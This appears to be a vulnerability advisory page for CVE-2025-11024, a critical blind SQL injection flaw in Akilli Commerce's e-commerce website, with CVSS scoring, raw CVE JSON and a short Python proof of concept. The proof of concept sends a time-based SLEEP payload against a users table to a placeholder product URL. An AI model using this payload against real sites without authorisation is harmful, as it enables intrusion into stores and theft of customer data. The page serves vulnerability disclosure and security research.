Security Vulnerability Report
中文
CVE-2025-11024 CVSS 9.8 CRITICAL

CVE-2025-11024

Published: 2026-05-14 10:16:18
Last Modified: 2026-05-14 16:20:13

Description

Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website allows Blind SQL Injection. This issue affects E-Commerce Website: before 4.5.001.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Akilli E-Commerce Website < 4.5.001

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for Blind SQL Injection in CVE-2025-11024 import requests import time target = "http://example.com/product" # Example Payload for Time-Based Blind SQL Injection # This payload attempts to delay the response if the condition is true payload = "1' AND (SELECT SLEEP(5) FROM users WHERE username='admin')-- -" params = {"id": payload} try: start_time = time.time() response = requests.get(target, params=params, timeout=10) end_time = time.time() if end_time - start_time > 5: print("[+] Vulnerability Confirmed: SQL Injection detected via time delay.") else: print("[-] Not vulnerable or condition not met.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11024", "sourceIdentifier": "[email protected]", "published": "2026-05-14T10:16:17.760", "lastModified": "2026-05-14T16:20:13.477", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website allows Blind SQL Injection.\n\nThis issue affects E-Commerce Website: before 4.5.001."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0222", "source": "[email protected]"}]}}